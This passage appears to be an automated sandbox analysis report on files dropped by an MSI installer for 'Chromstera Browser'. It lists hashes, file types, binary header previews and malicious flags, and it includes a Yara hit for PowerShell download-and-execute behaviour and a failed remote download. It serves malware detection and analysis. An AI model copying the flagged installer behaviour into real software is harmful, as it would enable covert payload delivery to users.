                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0......c.....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Installer\MSICA7D.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0......c.....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Installer\MSICAEB.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):217920
                                                                                                                                                                            Entropy (8bit):6.659990688109136
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:s3mBJDmU1w79thLwNj3xrvkLzDSpjqBIe2c8AOAg0FuDGMxwVb7zY2+fS4P:s3MN9WmHcLz+pjqgAOSMmEfSC
                                                                                                                                                                            MD5:AE9AA65470306DB7DB02371779BBCE64
                                                                                                                                                                            SHA1:6580975408BC4013A5E7A3E717912B30B1CB6294
                                                                                                                                                                            SHA-256:FB7B23455C1BE134A4F89824F1CE45EF7D09A25188B6C726ADA9690C9B28EF33
                                                                                                                                                                            SHA-512:DB36D383DED9DA8C5B0BE211CB3C816787629993015763A5A19067BC86351C65CC4A9ED149416DF47D3DE02EA3CC35803862EA029FBD5059B1633A2630F7A769
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W..............................................._..............................Q......9...........Rich...........PE..L...A>.d.........."!...$..................... ...............................P.......I....@.....................................<.... ..................@=...0..\.......p...................@...........@............ ...............................text...V........................... ..`.rdata....... ......................@..@.data...4...........................@....rsrc........ ......................@..@.reloc..\....0......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Installer\MSICB79.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):753984
                                                                                                                                                                            Entropy (8bit):6.46150792241965
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:ZQznHEVvieXxN4Mbq6Xe8wTAolS1IUNyz+ly/U0GCt57Wf63RfkleA:QnHEVv9fpXRARw1IUNA/n957Wf63h0eA
                                                                                                                                                                            MD5:8F517D6C505B7F9EC21CD40DB49227D9
                                                                                                                                                                            SHA1:E7C7E0ED1D8B2F09FF187C516F22747CD3ED49F8
                                                                                                                                                                            SHA-256:A908CD8FC097381F5A49A9FE1E1D3F81873D4004732A655EBF2AFA93BDF126CF
                                                                                                                                                                            SHA-512:DCD087F3ECF30A348A8D99962D5B69A1A78627218C775E03A41233622F433B2C12FA3138084B84E89AC8A681601A5333E379BB3701FE7321C36EFB2E20E5F26F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......':r.c[.Tc[.Tc[.T.).Un[.T.).U.[.T.%.Ur[.T.%.U{[.T.).Uz[.T.%.U=[.T.).Ub[.T.).Ut[.Tc[.T.Z.Tz$.U([.Tz$.Ub[.Tz$.Tb[.Tc[.Tb[.Tz$.Ub[.TRichc[.T................PE..L...S>.d.........."!...$.>..........8........P......................................,.....@.........................`..................h............D..@=.......r.....p............................e..@............P..........@....................text....=.......>.................. ..`.rdata...q...P...r...B..............@..@.data...H(..........................@....rsrc...h...........................@..@.reloc...r.......t..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Installer\MSICBB9.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0......c.....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Installer\MSICC46.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6434340
                                                                                                                                                                            Entropy (8bit):6.68149115147602
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:98304:evSeSNn/8/nTn/8/nkn/8/neYJqYJ4n/8/nZn/8/n4n/8/nW+uKTFd:x/MT/Mk/MlJZJ4/MZ/M4/M4S
                                                                                                                                                                            MD5:CE3829A031A468B4E2DFF76877D19C81
                                                                                                                                                                            SHA1:0BD9A3F51B26751552646DC41B18534CE8BCC4E4
                                                                                                                                                                            SHA-256:49F85BA7AC0A545A893C7B9B99535C608D81850137ACEA73551B50D79E051831
                                                                                                                                                                            SHA-512:3A9636B8657F8973297E0028ED936127E1A946934CD2478B9B28DB5BEB9157B92BB3ED2F74D0892D8A5E4348B76D7400270F89D5BE344801C5FDFD2D01799A9B
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Yara Hits:
                                                                                                                                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Windows\Installer\MSICC46.tmp, Author: Joe Security
                                                                                                                                                                            Preview:...@IXOS.@.....@mq\Y.@.....@.....@.....@.....@.....@......&.{441BEFA6-D7B1-4C8C-8CF9-5A4D6215E43D}..Chromstera Browser..Chromnius-Main.msi.@.....@.....@.....@........&.{2BF917DE-5B34-453F-A1C8-08CE02C334FC}.....@.....@.....@.....@.......@.....@.....@.......@......Chromstera Browser......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........AI_RemoveAllTempFiles....J...AI_RemoveAllTempFiles.@......@S..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W..............................................._..............................Q......9...........Rich...........PE..L...A>.d.........."!...$..................... ...............................P.......I....@.....................................<.... ..................@=...0..\.......p...................@...........@............ ...............................text...V..........................

                                                                                                                                                                            C:\Windows\Installer\MSICC66.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):211776
                                                                                                                                                                            Entropy (8bit):6.545789465666009
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:APFAhETm5/VCZCuRspcZ2XcIQISCXOtwypRnWmomS7/Br5vEgn/Zr/e:bim5/VJuRLXDCXObptI/p5vD12
                                                                                                                                                                            MD5:6CE8F1D957A3545827ABA750E2087548
                                                                                                                                                                            SHA1:4EF30873A3A4CD2138320A3AECF9C0235F2993A9
                                                                                                                                                                            SHA-256:6DE3B9B00849AB2398B36446B16E7A435CDBF8610B31FFD36E381636DC33E3A8
                                                                                                                                                                            SHA-512:030E400A759B4F4B972D92BFCA8771A90BD87DE8C93B8BAD99B814563D52CC97703A0C21DFAA4D022D2111CCD77F9144D028F2016C66F3429E59589A8B390DB9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.R...<...<...<...?.u.<...9...<..8.n.<..?.l.<...8.i.<..9.K.<...:.~.<...=.n.<...=...<.f.5.g.<.f.<.~.<.f..~.<....~.<.f.>.~.<.Rich..<.................PE..L....=.d.........."!...$.0...........2.......@...............................0............@.................................H...x.......x...............@=......x......p............................E..@............@..........@....................text...]/.......0.................. ..`.rdata.......@.......4..............@..@.data...............................@....rsrc...x...........................@..@.reloc..x........ ..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Installer\MSID04F.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):211776
                                                                                                                                                                            Entropy (8bit):6.545789465666009
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:APFAhETm5/VCZCuRspcZ2XcIQISCXOtwypRnWmomS7/Br5vEgn/Zr/e:bim5/VJuRLXDCXObptI/p5vD12
                                                                                                                                                                            MD5:6CE8F1D957A3545827ABA750E2087548
                                                                                                                                                                            SHA1:4EF30873A3A4CD2138320A3AECF9C0235F2993A9
                                                                                                                                                                            SHA-256:6DE3B9B00849AB2398B36446B16E7A435CDBF8610B31FFD36E381636DC33E3A8
                                                                                                                                                                            SHA-512:030E400A759B4F4B972D92BFCA8771A90BD87DE8C93B8BAD99B814563D52CC97703A0C21DFAA4D022D2111CCD77F9144D028F2016C66F3429E59589A8B390DB9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.R...<...<...<...?.u.<...9...<..8.n.<..?.l.<...8.i.<..9.K.<...:.~.<...=.n.<...=...<.f.5.g.<.f.<.~.<.f..~.<....~.<.f.>.~.<.Rich..<.................PE..L....=.d.........."!...$.0...........2.......@...............................0............@.................................H...x.......x...............@=......x......p............................E..@............@..........@....................text...]/.......0.................. ..`.rdata.......@.......4..............@..@.data...............................@....rsrc...x...........................@..@.reloc..x........ ..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Installer\MSID11C.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):664896
                                                                                                                                                                            Entropy (8bit):6.580111290566735
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:lurEvhNDNMgr6xtRdYn/VkRFcJcI32R7vKG+4vz/1FJlt2X45c6EKgkj:0ihNREtRdYndJP32R7vKG+47/L0I5jEg
                                                                                                                                                                            MD5:F2DD0D7EBAB0352E434FA65386425F33
                                                                                                                                                                            SHA1:A6D808538D1A0D7984B4AE3DCD16AEA185702E50
                                                                                                                                                                            SHA-256:1C65E72519B605E0A322DD32625782978A5BC74CEC81F73638A215CA5B9D0F9D
                                                                                                                                                                            SHA-512:76D1F0125835C13B5E0CE52E9AAB450713CB45A82544215E1EE17B094FD5D16B066544E032E96F94F727427F055F691655D6DBBB5E4A8C54AF774A2B97F524C0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3.:.w.T,w.T,w.T,..W-z.T,..Q-.T,..P-a.T,..P-f.T,..W-m.T,..Q-+.T,..U-`.T,w.U,\.T,n.]-@.T,n.T-v.T,n.,v.T,w..,v.T,n.V-v.T,Richw.T,........PE..L...K>.d.........."!...$.r..................................................0......+.....@..........................q.......q..........................@=.......\......p...............................@............................................text....q.......r.................. ..`.rdata..v............v..............@..@.data................h..............@....rsrc...............................@..@.reloc...\.......^..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Installer\MSIEC26.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):664896
                                                                                                                                                                            Entropy (8bit):6.580111290566735
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:lurEvhNDNMgr6xtRdYn/VkRFcJcI32R7vKG+4vz/1FJlt2X45c6EKgkj:0ihNREtRdYndJP32R7vKG+47/L0I5jEg
                                                                                                                                                                            MD5:F2DD0D7EBAB0352E434FA65386425F33
                                                                                                                                                                            SHA1:A6D808538D1A0D7984B4AE3DCD16AEA185702E50
                                                                                                                                                                            SHA-256:1C65E72519B605E0A322DD32625782978A5BC74CEC81F73638A215CA5B9D0F9D
                                                                                                                                                                            SHA-512:76D1F0125835C13B5E0CE52E9AAB450713CB45A82544215E1EE17B094FD5D16B066544E032E96F94F727427F055F691655D6DBBB5E4A8C54AF774A2B97F524C0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3.:.w.T,w.T,w.T,..W-z.T,..Q-.T,..P-a.T,..P-f.T,..W-m.T,..Q-+.T,..U-`.T,w.U,\.T,n.]-@.T,n.T-v.T,n.,v.T,w..,v.T,n.V-v.T,Richw.T,........PE..L...K>.d.........."!...$.r..................................................0......+.....@..........................q.......q..........................@=.......\......p...............................@............................................text....q.......r.................. ..`.rdata..v............v..............@..@.data................h..............@....rsrc...............................@..@.reloc...\.......^..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Installer\MSIFB77.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):570176
                                                                                                                                                                            Entropy (8bit):6.4754135618709885
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:V7illiy0jC24y27NuNMM1o6BFCzS0IJPD+G63u+znIBhVWYusLQys6od5zg:UuGBYusLRs6S5zg
                                                                                                                                                                            MD5:514314174B6F6A3AB2195C456B83AA1E
                                                                                                                                                                            SHA1:D4CEDCB663F534FBDC93D7A53E0A5A4CAE2B4E7B
                                                                                                                                                                            SHA-256:DC20BD05C938C5C9CE13D2D3CD78D1479B7D74C24E1356F36C7C8E8F6BEFE597
                                                                                                                                                                            SHA-512:061AE3D1D410F24EB6C13E3B0AF81E760881E9F4A71EA1FB9F84E84D20047F719B845BEA7F435454DF33310FE1294D46F8F7DD40EAAFFCEB53D280A9238BD9F2
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aawD..$D..$D..$.r.%N..$.r.%...$.~.%V..$.~.%N..$.~.%...$.r.%P..$.r.%E..$.r.%]..$D..$...$]..%^..$]..$E..$D..$E..$]..%E..$RichD..$........................PE..d....>.d.........."....$.4...h......`..........@..........................................`.............................................................8....p...?...v..@=......l...@x..p....................y..(....w..@............P.. ............................text...<3.......4.................. ..`.rdata.......P.......8..............@..@.data...,G... ......................@....pdata...?...p...@..................@..@_RDATA..\............X..............@..@.rsrc...8............Z..............@..@.reloc..l............f..............@..B................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Installer\SourceHash{441BEFA6-D7B1-4C8C-8CF9-5A4D6215E43D}

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                            Entropy (8bit):0.7903190731460404
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:JSbX72Fj4XAlfLIlHuRpFhG7777777777777777777777777ZDHFkTNQRskSpW6w:JYUIwYikSHkF
                                                                                                                                                                            MD5:4ABDC48549915868E5ACE18556DF33A3
                                                                                                                                                                            SHA1:92EE321A29713A2327E6DBF91D6705E51690237E
                                                                                                                                                                            SHA-256:B336DE350F1BD596987674E0836A141407B85652F3C34BC00D2561861A15F865
                                                                                                                                                                            SHA-512:77AAC75B891D646E7768ABEF5644FC152F907D59CB4FF7EE222FF46106386A6DEC53EADF3BE8E9813CF88BA3E476FBD244D8387FFA0EE9441CB4C738A2DFF9A6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                            Entropy (8bit):1.4778506022448366
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:dbMubs4aFXzBT5lUkKvy9dlGb4pWSkdFE4pB+9iH9Z9f/ZpHAtvC5v1v/vqsDFDS:NMv/TLkeGlXHZAtatn3gOa5R
                                                                                                                                                                            MD5:6E923EF4AFB8BB8C0852F4635C6CE2A8
                                                                                                                                                                            SHA1:4F272659CD8830829A49F2FD467D5507D173FAC6
                                                                                                                                                                            SHA-256:64337AA249EBD51495A3837CB2EC1F7FB85DBEB5C044AB87C5ADFC124F6C898B
                                                                                                                                                                            SHA-512:42E734F29C1108335D716632DDD26C585469DB4BEAE899E31B9F0B1144F19248D153B0EC48AA5758A0EE2B070EEB992FEFC75046C23E5812136877DBB7785E5E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):432221
                                                                                                                                                                            Entropy (8bit):5.375183336522233
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauP:zTtbmkExhMJCIpErS
                                                                                                                                                                            MD5:EFD20624AF25AE6B4500B224AA6F6E27
                                                                                                                                                                            SHA1:EAE78D092E2202409C06682AAF2772B9675303AA
                                                                                                                                                                            SHA-256:AE93EEFB0FC9BB5C9AE36BB671CE70C73B9A19AE63C249BFBDE1AC8FAD4350A8
                                                                                                                                                                            SHA-512:49F2B5AD4AFAB110D3451A2FA4AD87FD1F102C2F4D5BF94E6D7DCD0E4E2E82FF3707D93E901111752D7586818C32FC5125DAFB5F181F0B58FA4A69B1B1D7EED1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                            C:\Windows\SystemTemp\ProD28F.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):119
                                                                                                                                                                            Entropy (8bit):4.705502631558087
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:RrwNFRJ9fVl3HY9lFFH0y3yHXWTbMExAiqFrKRZJzyn:RrwXz9fVBYtFH0uy3I4miFOZJzyn
                                                                                                                                                                            MD5:500ED8AEBC03F996A593076ACBB47984
                                                                                                                                                                            SHA1:BA9657F90E586C1E43758400B48F724E48F54DE6
                                                                                                                                                                            SHA-256:7A5ADC811C18F01C442372B3A06F70D8242C0EDEB5754CAC3187CF593B26B220
                                                                                                                                                                            SHA-512:0D01F057D15E2B2E18CE5B7DE59C26B488A67BBDD2D1E64E861BE3C687DF0EDC22CEEBDFF6D6AAD05DD83391DF283695F7BD7CEF14A18836827C33CFE7AED2D0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:ERROR: Exception calling "DownloadFile" with "2" argument(s): "The remote server returned an error: (404) Not Found."..

                                                                                                                                                                            C:\Windows\SystemTemp\pssD27E.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):41576
                                                                                                                                                                            Entropy (8bit):4.059201502342394
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:5WbLVyvvo51AbfOcQ8k1jauBugqlgV5xWvjJudHaUtlGIc:20g8TmFplQS5ANybc
                                                                                                                                                                            MD5:48D34C3DD04BD24AAA81BB426AA70FD3
                                                                                                                                                                            SHA1:DE6744FBEFCA526D2360604CE0E4254F0B32728D
                                                                                                                                                                            SHA-256:4DB3A21458C65880AD6D3314DE71E717EF506A36F7B02E280C820743ABF6341B
                                                                                                                                                                            SHA-512:858F7DC6AE631781C13BFAFE4964A0087BED75797EF8688342CC6C2E2412DFB76D0E8301822B3B6A37C96E399785FC5DF3641445063A83AF4B1555EC7C131711
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".l.i.n.e.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.L.i.n.e.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                            C:\Windows\SystemTemp\scrD25C.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):35840
                                                                                                                                                                            Entropy (8bit):4.0293324702446744
